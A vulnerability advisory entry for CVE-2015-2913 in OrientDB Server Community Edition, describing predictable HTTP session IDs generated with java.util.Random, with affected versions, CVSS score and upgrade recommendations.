PT-2015-5971 · Orientdb · Orientdb Server Community Edition

Raffaela Frank

Published

2015-12-31

Updated

2018-10-18

CVE-2015-2913

CVSS v3.1

5.9

Medium

Vector

AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

Name of the Vulnerable Software and Affected Versions OrientDB Server Community Edition versions 2.0.0 through 2.0.14 OrientDB Server Community Edition versions 2.1.x prior to 2.1.1

Description The issue arises from the improper reliance on the java.util.Random class for generating random Session ID values in the server/network/protocol/http/OHttpSessionManager.java file. This makes it easier for remote attackers to predict a Session ID value by determining the internal state of the PRNG in this class.

Recommendations For OrientDB Server Community Edition versions 2.0.0 through 2.0.14, update to version 2.0.15 or later. For OrientDB Server Community Edition versions 2.1.x prior to 2.1.1, update to version 2.1.1 or later.

Fix

Use of Insufficiently Random Values

Information Disclosure

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-330CWE-200

Related Identifiers

CVE-2015-2913

GHSA-V6WR-FCH2-VM5W

Affected Products

Orientdb Server Community Edition

PT-2015-5971 · Orientdb · Orientdb Server Community Edition

CVE-2015-2913

Weakness Enumeration

Related Identifiers

Affected Products

References · 6